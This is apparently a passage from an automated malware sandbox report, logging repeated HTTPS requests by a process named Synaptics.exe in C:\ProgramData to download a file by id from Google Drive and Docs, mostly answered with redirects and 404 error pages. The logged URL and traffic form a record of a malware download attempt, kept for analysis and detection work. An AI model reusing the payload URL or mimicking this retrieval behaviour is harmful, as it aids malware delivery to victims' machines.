                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            63192.168.2.950011216.58.206.654437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:56 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:29:57 UTC1250INHTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC5rpCmOp6GBLlIewz1sOC_4-LHCpJIBC8yDECOdolY20NdmiVshhQitqlaJHteAQ_hYrWP6QPY
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:56 GMT
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-JCBlBtjVnkQptvRrDkWd5w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:29:57 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                            2025-01-02 19:29:57 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6b 66 56 42 65 53 6a 79 30 64 76 54 34 46 6c 6a 31 66 4e 68 68 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                            Data Ascii: 404 (Not Found)!!1</title><style nonce="kfVBeSjy0dvT4Flj1fNhhA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                            2025-01-02 19:29:57 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                            Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            64192.168.2.950012172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:56 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            65192.168.2.950013216.58.206.654437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:57 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            66192.168.2.950021216.58.206.654437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:57 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:29:58 UTC1250INHTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC5oP4QgKmgYUzZvf-JedWYTvOydVlb-stILsoGAXXeE0e2Uihcbci9OFgYcHHeBNisW4ATfltM
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:58 GMT
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-VR6ahjIG_wg5n4_iPIggVw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:29:58 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                            2025-01-02 19:29:58 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 30 74 53 38 6d 37 72 32 55 64 70 6c 30 64 4b 74 35 6e 69 47 7a 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                            Data Ascii: 404 (Not Found)!!1</title><style nonce="0tS8m7r2Udpl0dKt5niGzg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                            2025-01-02 19:29:58 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                            Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            67192.168.2.950023172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:57 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:29:58 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:58 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-miKmRRd7eRUCjbtlQqU9_g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            68192.168.2.950022172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:57 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:29:58 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:58 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-b5XRzgwfEvg3NBzDJchA5A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            69192.168.2.950032216.58.206.654437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:58 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:29:59 UTC1250INHTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC7zKI6lHdmOUVGkvMYX1JFhOAHlFegcAy3EygHYlNcej5U4I5caa-rekDNPjZ0urTxn6iDkSi0
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:59 GMT
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-1XR6IPdPjRdXm-ERuWzgvQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:29:59 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                            2025-01-02 19:29:59 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 69 71 6a 32 59 67 75 50 32 79 71 38 4d 76 71 4d 70 6f 67 6e 4c 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                            Data Ascii: 404 (Not Found)!!1</title><style nonce="iqj2YguP2yq8MvqMpognLw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                            2025-01-02 19:29:59 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                            Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            70192.168.2.950034172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:58 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:29:59 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:59 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-z81Z2iZrKABzAttfuR6jxg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            71192.168.2.950035216.58.206.654437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:59 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:29:59 UTC1243INHTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC6FPKwO6G8kt_HYorVVQuVNDcTN3GhSYGlMiOvDsIsSlOeBV2wem5SkJhheK7Y1SkNS
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:59 GMT
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-rs8ZQ90njOfWcy-JEvCFjg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
